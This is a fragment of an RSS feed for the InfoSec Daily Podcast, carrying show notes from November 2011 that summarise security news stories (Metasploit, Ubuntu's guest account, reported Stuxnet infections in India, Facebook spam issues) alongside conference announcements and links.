<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The base about 60 miles south of Denver controls more than 60 military satellites.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="https://community.rapid7.com/community/metasploit/blog/2011/11/21/hd-moores-law"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">https://community.rapid7.com/community/metasploit/blog/2011/11/21/hd-moores-law</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">At Metricon6 and later on his blog</span><a href="http://cognitivedissidents.wordpress.com/2011/11/01/intro-to-hdmoores-law/"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Cognitive Dissidents</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">, Joshua Corman presented his latest discovery &#8211; HD Moore&#39;s Law:</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;Casual Attacker power grows at the rate of Metasploit&quot;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Which is basically a different way of saying that Metasploit is the minimum bar you need to test for if you want to keep your network secure.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">HD Moore created the Metasploit Project in 2003 to provide the security community with a public resource for exploit development. This project resulted in the Metasploit Framework, an open source platform for writing security tools and exploits.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The Metasploit Framework took away some of the &quot;black magic&quot; components of hacking, making it accessible to network admins and security professionals with &quot;lesser powers&quot; to run typical hacking attacks against their own network to see if the network is vulnerable. They could then use these findings to remediate any security issues they found. This is still true today.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">At the same time, this commoditization of exploit tools made it easier for a casual attacker to exploit other people&#39;s network, and this is where Joshua Corman&#39;s comment comes in: If you can breach your own network, then someone else can too. Because Metasploit is the industry&#39;s leading penetration testing tool with about 120,000 users, it is both the best way to test your network&#39;s security and also the most likely vector of attack.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="https://www.infosecisland.com/blogview/18268-Ubuntu-Decreases-Security-and-Calls-it-a-Feature.html"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">https://www.infosecisland.com/blogview/18268-Ubuntu-Decreases-Security-and-Calls-it-a-Feature.html</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Have you played with the latest version of Ubuntu yet? Ubuntu 11.10 named Oneiric Ocelot (Who makes up these names?), was released last month and comes with a couple surprises.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When you boot it up, you will see two differences. First of all, the standard Gnome Desktop is not installed by default. Unity, which was an option in 11.04, is now the standard desktop.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Unity is a graphical interface that makes your system look more like the latest fad tablet Operating Systems. I hated it at first, but it has grown on me.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Don&rsquo;t like it? No worries, you can install the classic gnome interface with the following command:</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">sudo apt-get install gnome-panel</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">But the second addition is the most concerning. If you look at the user list there is a new user present &ndash; &ldquo;Guest Session&rdquo;. There is no security on this account. Just select &ldquo;Guest Session&rdquo;, leave the password blank and log in!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Okay, I know, you need to be an admin to be able to run anything potentially damaging. If you log into the Guest account and try to run a system command you get &ldquo;Permission Denied&rdquo;. And you still need the root password to install software and execute the &lsquo;SUDO&rsquo; command.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">So what is the problem?</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">It is an opening, a small crack. And where there is a crack, there is an opportunity for exploit. Microsoft learned this lesson years ago and has since disabled the Guest account by default.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Why would Ubuntu do this?</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;The Guest account is not really a problem, and it&rsquo;s been there a long time, it&rsquo;s just that it&rsquo;s a bit more obvious now that it&rsquo;s listed in the login screen.&rdquo;, </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Mentions an Ubuntu team member in a</span><a href="https://answers.launchpad.net/ubuntu/+source/lightdm/+question/175756"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">support forum</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Luckily he also mentions how to disable it, because the user does not show up in the user list!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">You can disable the guest account (in 11.10 only) by editing the /etc/lightdm/lightdm.conf and add the line:</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">allow-guest=false</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">You will need to reboot for this to take effect.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When I first heard about this, I updated one of my Ubuntu 11.04 systems to 11.10 to see if this was true. Sure enough, after the update was complete and the system rebooted &ndash; I had a &ldquo;Guest Session&rdquo; account. I did not have any guest users enabled on my system before.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Don&rsquo;t get me wrong, I love Ubuntu, am an avid user and highly recommend it. But enabling users with no passwords by default? Call it a feature I guess?</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="http://www.tehelka.com/story_main51.asp?filename=Ne261111India.asp"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.tehelka.com/story_main51.asp?filename=Ne261111India.asp</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When the Stuxnet cyber attack temporarily took down the Iranian nuclear facility at Natanz in 2010, it made few waves in India. However, shocking details have now emerged that barely a few months after the computer worm created problems in Iran, critical infrastructure in India too was infected by the tactical cyber weapon developed in Israeli laboratories.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">In June 2010, ONGC oil rigs using SCADA (Supervisory Control and Data Acquisition) industrial systems were found to be infected by the same worm. The oil major, whose control systems are run by ABB, didn&rsquo;t face an immediate threat because the worm was programmed to target Siemens systems. However, with 247 onshore production facilities, 11 offshore processing complexes, 74 drilling rigs and 7,000 wells, all run by a centralised control system, an attack could have taken out India&rsquo;s entire oil production for days, if not weeks.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; </span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Just a few weeks after that shocking discovery, Indian investigators also stumbled upon massive infections in a mega power project in Gujarat using SCADA systems controlling the generation and transmission network in western India. Investigators pieced together the evidence and launched a probe into other vulnerable systems that revealed facts that were too sensitive and complex to be made public. They discovered that the same attack was perfectly capable of knocking off signal and control systems on Delhi Metro&rsquo;s crucial links, throwing the capital&rsquo;s most used public transport system into chaos.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; </span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Earlier, cyber security investigative researcher Jeffrey Karr had shocked ISRO when he proved that India&rsquo;s INSAT 4B satellite was taken down by Stuxnet to serve Chinese business interests. On 7 July 2010, INSAT 4B&rsquo;s power glitch forced India&rsquo;s leading DTH providers such as Sun Direct, Doordarshan and Tata Teleservices to shift to ASIASAT-5, a satellite owned by the Chinese government. INSAT 4B was using the same Siemens software that was responsible for activating Stuxnet to make the Iranian nuclear facility go haywire.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; </span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Despite the fact that cyber security is being breached every day, there seems to be little urgency in devising a National Cyber Security Policy that could provide not just a security blanket against future attacks but also a framework for offensive capabilities that enables India to retaliate and launch attacks against enemy nations.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; </span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="http://www.darkreading.com/security/attacks-breaches/231903423/researchers-seven-annoying-attacks-that-facebook-misses.html"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.darkreading.com/security/attacks-breaches/231903423/researchers-seven-annoying-attacks-that-facebook-misses.html</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Facebook has largely erased the rash of porn and violent images that affected the site earlier this week, but its problems are far from over, researchers said yesterday.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">In a blog about Facebook&#39;s security vulnerabilities posted Thursday, researchers at security vendor Barracuda Networks said Facebook still has little incentive to improve its site security.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;When you are trying to grow a social network as well as increase advertising revenue, security becomes not only a lower priority but sometimes a conflict of interest,&quot; the blog states.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Facebook continues to miss some key security issues on its pages, Barracuda says, and it outlined seven:</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">1. Fake Product Pages.</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">2. Manipulated Accounts Recommendations.</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">3. Affiliate Spam.</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">4. Photo Tagging For Spam.</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">5. Fake Apps.</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">6. Stolen Pictures.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">7. Anomalous Behavior.</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span></p>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-528-gps-hostage-situation-hd-moores-law-oneiric-ocelot-indian-scada-facebook/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3179/0/infosec-daily-podcast-episode-528.mp3" length="23048295" type="audio/mpeg" />
		<itunes:duration>0:47:58</itunes:duration>
		<itunes:subtitle>InfoSec Daily Podcast Episode 528 for November 21, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Dave Kennedy, Boris Sverdlik, Beau Woods, Karthik Rangarajan, and Varun Sharma.
	Announcements:
	No Show on Thursday (11/24) or Friday (11/[...]</itunes:subtitle>
		<itunes:summary>InfoSec Daily Podcast Episode 528 for November 21, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Dave Kennedy, Boris Sverdlik, Beau Woods, Karthik Rangarajan, and Varun Sharma.
	Announcements:
	No Show on Thursday (11/24) or Friday (11/25). &#160;
	In order to allow our hosts to enjoy the Holiday and spend time with their families we will not have any shows on Thursday (11/24) or Friday (11/25). &#160;Dr. Bonez will have his weekend show on 11/26. &#160;The normal show will return on 11/28.
	Brad Smith (theNurse)
	We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted he had a massive stroke and has been in the hospital in a coma for a few days.
	Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &#160;Please feel free to check in for status or to donate. &#160;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.
	http://www.social-engineer.org/brad-smith-updates/
	http://www.social-engineer.org/bradsmithdonation/
	Vote For Wim Remes
	When: Starts November 16, 2011
	Where: ISC2
	Who: CISSP&#8217;s
	http://blog.isc2.org/isc2_blog/2011/11/cast-your-vote-isc%C2%B2-board-of-directors-election-begins-nov-16-2011.html
	SANS Mentoring: Forensics 408 &#8211; Computer Forensic Essentials
	When: Starts November 30, 2011
	Where: Atlanta, GA
	Discount Code: M1011IPAD (free iPad 2)
	http://www.sans.org/mentor/details.php?nid=25504
	ShmooCon 2012
	When: January 27th-29th, 2012
	Where: Washington Hilton Hotel, Washington, DC
	http://www.shmoocon.org
	DerbyCon 2012 &#8211; &#34;The Reunion&#34;
	When: &#160;September 27-30, 2012
	Where: Louisville, KY
	http://www.derbycon.com
	Thanks to everyone that has purchased products from Amazon through the affiliate program. &#160;If you&#8217;re not familiar with the affiliate program, simply go to http://www.isdpodcast.com and locate the Affiliate Program link on the right hand side.
	You don't have a sufficient version of Flash Player to display this animation.
	Stories:
	Source: http://www.stripes.com/gunman-barricaded-in-building-at-colorado-air-base-1.161338
	An airman armed with a pistol barricaded himself in a building at an Air Force base in Colorado that controls all GPS satellites, but operations haven&#39;t been disrupted, officials said Monday.
	The building was evacuated, and no shots were fired and no one was injured, said Schriever Air Force Base spokeswoman Jennifer Thibault.
	A negotiator and a SWAT team from the El Paso County Sheriff&#39;s Department were on scene at the Air Force&#39;s request, said Air Force Lt. Marie Denson.
	Thibault said the airman is a member of a security squadron and is armed with his own handgun. 
	Officials were investigating how he got the weapon past security and onto the base.
	The airman is in a building where personnel prepare for deployments, Thibault said.
	Control rooms for GPS and other military satellites are in a separate, heavily protected inner compound surrounded by fences and staffed with armed guards.
	The gunman faces a discharge over a matter in civilian court, but no other details were available, Denson said. He is still classified as being on active duty, she said.
	The airman&#39;s name, rank and service history weren&#39;t immediately released.
	The base about 60 miles south of Denver controls more than 60 military satellites.
	Source: https://community.rapid7.com/community/metasploit/blog/2011/11/21/hd-moores-law
	At Metricon6 and later on his blog Cognitive Dissidents, Joshua Corman presented his latest discovery &#8211; HD Moore&#39;s Law:
	 
	&#34;Casual Attacker power grows at the rate of Metasploit&#34;
	 
	Which is basically a different way of saying that Metasploit is the minimum bar you need to test for if you want to keep your network secure.
	 
	HD Moore created the Metasploit Project in 2003 to provide the secur[...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, and Dr. Bonez.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 527 &#8211; Weekend Wrap-up with Dr. B0n3z</title>
		<link>http://www.isdpodcast.com/episode-527-weekend-wrap-up-with-dr-b0n3z</link>
		<comments>http://www.isdpodcast.com/episode-527-weekend-wrap-up-with-dr-b0n3z#comments</comments>
		<pubDate>Sun, 20 Nov 2011 04:28:33 +0000</pubDate>
		<dc:creator>rick.hayes</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3175</guid>
		<description><![CDATA[Episode 527 &#8211; Weekend Wrap-up with Dr. B0n3z InfoSec Daily Podcast Episode 527 for November 19, 2011. &#160;Tonight&#39;s podcast is hosted by Dr. B0n3z, &#38; Boris Sverdlik. Guests: hackett, aricon, &#38; spridel. Announcements: SANS Mentoring: Forensics 408 &#8211; Computer Forensic When: Starts November 30, 2011 Where: Atlanta, GA Discount Code: M1011IPAD (free iPad 2) http://www.sans.org/mentor/details.php?nid=25504 [...]]]></description>
			<content:encoded><![CDATA[<p><span class="Apple-style-span" style="color: rgb(0, 0, 0); font-family: Arial; font-size: 15px; font-weight: bold; white-space: pre-wrap; ">Episode 527 &#8211; Weekend Wrap-up with Dr. B0n3z</span></p>
<div style="background-color: transparent; "><span style="font-size: 15px; font-family: Arial; color: rgb(0, 0, 0); background-color: transparent; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; ">InfoSec Daily Podcast Episode 527 for November 19, 2011. &nbsp;Tonight&#39;s podcast is hosted by Dr. B0n3z, &amp; Boris Sverdlik.</span></p>
<p>	<span style="font-size: 15px; font-family: Arial; color: rgb(0, 0, 0); background-color: transparent; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; ">Guests: hackett, aricon, &amp; spridel.</span></p>
<p>	<span style="font-size: 15px; font-family: Arial; color: rgb(0, 0, 0); font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; ">Announcements:</span><br />
	<span style="font-size: 15px; font-family: Arial; color: rgb(0, 0, 0); font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; ">SANS Mentoring: Forensics 408 &ndash; Computer Forensic </span><br />
	<span style="font-size: 15px; font-family: Arial; color: rgb(0, 0, 0); text-decoration: none; vertical-align: baseline; white-space: pre-wrap; ">When: Starts November 30, 2011</span><br />
	<span style="font-size: 15px; font-family: Arial; color: rgb(0, 0, 0); text-decoration: none; vertical-align: baseline; white-space: pre-wrap; ">Where: Atlanta, GA</span><br />
	<span style="font-size: 15px; font-family: Arial; color: rgb(0, 0, 0); text-decoration: none; vertical-align: baseline; white-space: pre-wrap; ">Discount Code: M1011IPAD (free iPad 2)</span><br />
	<a href="http://www.sans.org/mentor/details.php?nid=25504"><span style="font-size: 15px; font-family: Arial; color: rgb(0, 0, 153); vertical-align: baseline; white-space: pre-wrap; ">http://www.sans.org/mentor/details.php?nid=25504</span></a></p>
<p>	<span style="font-size: 15px; font-family: Arial; color: rgb(0, 0, 0); font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; ">ShmooCon 2012</span><br />
	<span style="font-size: 15px; font-family: Arial; color: rgb(0, 0, 0); text-decoration: none; vertical-align: baseline; white-space: pre-wrap; ">When: January 27th-29th, 2012</span><br />
	<span style="font-size: 15px; font-family: Arial; color: rgb(0, 0, 0); text-decoration: none; vertical-align: baseline; white-space: pre-wrap; ">Where: Washington Hilton Hotel, Washington, DC</span><br />
	<a href="http://www.shmoocon.org/"><span style="font-size: 15px; font-family: Arial; color: rgb(0, 0, 153); vertical-align: baseline; white-space: pre-wrap; ">http://www.shmoocon.org</span></a></p>
<p>	<span style="font-size: 15px; font-family: Arial; color: rgb(0, 0, 0); font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; ">DerbyCon 2012 &ndash; &quot;The Reunion&quot;</span><br />
	<span style="font-size: 15px; font-family: Arial; color: rgb(0, 0, 0); text-decoration: none; vertical-align: baseline; white-space: pre-wrap; ">When: &nbsp;September 27-30, 2012</span><br />
	<span style="font-size: 15px; font-family: Arial; color: rgb(0, 0, 0); text-decoration: none; vertical-align: baseline; white-space: pre-wrap; ">Where: Louisville, KY</span><br />
	<a href="http://www.derbycon.com/"><span style="font-size: 15px; font-family: Arial; color: rgb(0, 0, 153); vertical-align: baseline; white-space: pre-wrap; ">http://www.derbycon.com</span></a></p>
<p>
	<span style="font-size: 15px; font-family: Arial; color: rgb(0, 0, 0); background-color: transparent; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; "><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span></p>
<p>	<span style="font-size: 15px; font-family: Arial; color: rgb(0, 0, 0); font-weight: bold; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap; ">Stories:</span></p>
<p>	<span style="font-size: 15px; font-family: Arial; color: rgb(0, 0, 0); font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; ">Source:</span><span style="font-size: 15px; font-family: Arial; color: rgb(0, 0, 0); text-decoration: none; vertical-align: baseline; white-space: pre-wrap; "> </span><a href="https://www.infosecisland.com/security-videos-view/17944-Definition-of-a-Real-Security-Consultant.html"><span style="font-size: 15px; font-family: Arial; color: rgb(0, 0, 153); vertical-align: baseline; white-space: pre-wrap; ">https://www.infosecisland.com/security-videos-view/17944-Definition-of-a-Real-Security-Consultant.html</span></a></p>
<p>	<a href="http://www.tgdaily.com/security-features/59737-hackers-destroy-water-pump-in-scada-attack"><span style="font-size: 15px; font-family: Arial; color: rgb(0, 0, 153); background-color: transparent; vertical-align: baseline; white-space: pre-wrap; ">http://www.tgdaily.com/security-features/59737-hackers-destroy-water-pump-in-scada-attack</span></a><br />
	<span style="font-size: 15px; font-family: Arial; color: rgb(0, 0, 0); background-color: transparent; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; "><br class="kix-line-break" /><br />
	</span><a href="http://edition.cnn.com/2011/11/18/world/asia/afghanistan-twitter-war/index.html"><span style="font-size: 15px; font-family: Arial; color: rgb(0, 0, 153); background-color: transparent; vertical-align: baseline; white-space: pre-wrap; ">http://edition.cnn.com/2011/11/18/world/asia/afghanistan-twitter-war/index.html</span></a></p>
<p>	<a href="http://www.theregister.co.uk/2011/11/17/us_military_cyberspace/"><span style="font-size: 15px; font-family: Arial; color: rgb(0, 0, 153); background-color: transparent; vertical-align: baseline; white-space: pre-wrap; ">http://www.theregister.co.uk/2011/11/17/us_military_cyberspace/</span></a><span style="font-size: 15px; font-family: Arial; color: rgb(0, 0, 0); background-color: transparent; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; "><br class="kix-line-break" /><br />
	</span><br />
	<a href="http://www.extremetech.com/computing/105931-full-disk-encryption-is-too-good-says-us-intelligence-agency"><span style="font-size: 15px; font-family: Arial; color: rgb(0, 0, 153); background-color: transparent; vertical-align: baseline; white-space: pre-wrap; ">http://www.extremetech.com/computing/105931-full-disk-encryption-is-too-good-says-us-intelligence-agency</span></a></p>
<p>	<a href="http://packetstormsecurity.org/news/view/20202/Norweigian-Oil-And-Defense-Industries-Are-Hit-By-A-Major-Cyber-Attack.html"><span style="font-size: 15px; font-family: Arial; color: rgb(0, 0, 153); background-color: transparent; vertical-align: baseline; white-space: pre-wrap; ">http://packetstormsecurity.org/news/view/20202/Norweigian-Oil-And-Defense-Industries-Are-Hit-By-A-Major-Cyber-Attack.html</span></a><br />
